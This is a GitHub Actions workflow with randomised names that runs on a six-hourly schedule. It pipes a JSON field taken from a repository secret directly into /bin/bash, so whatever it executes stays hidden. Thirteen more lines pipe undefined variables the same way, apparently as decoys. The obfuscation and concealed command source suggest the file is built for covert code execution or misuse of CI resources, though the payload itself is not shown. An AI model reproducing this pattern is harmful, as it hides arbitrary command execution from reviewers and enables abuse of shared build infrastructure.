name: lushangfeng2380
on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lushangfeng2380
        env:
          tis24390: ${{ secrets.tis24390 }}
        run: |
          echo $tis24390 | jq -r .ikebn3512 | /bin/bash
          echo $sio8052 | jq -r .jovhs1 | /bin/bash
          echo $nvix9 | jq -r .ut59 | /bin/bash
          echo $pjnj99154 | jq -r .ds51793 | /bin/bash
          echo $kk55 | jq -r .bvszh19 | /bin/bash
          echo $m91829 | jq -r .askk6 | /bin/bash
          echo $bgaga5607 | jq -r .yb787 | /bin/bash
          echo $pkae0433 | jq -r .o4564 | /bin/bash
          echo $mvv6852 | jq -r .qihxz86 | /bin/bash
          echo $q3 | jq -r .ywbry40464 | /bin/bash
          echo $lpncb508 | jq -r .ue65513 | /bin/bash
          echo $kve16 | jq -r .sk9227 | /bin/bash
          echo $kyh588 | jq -r .yfnjg2282 | /bin/bash
          echo $smig41 | jq -r .s368 | /bin/bash

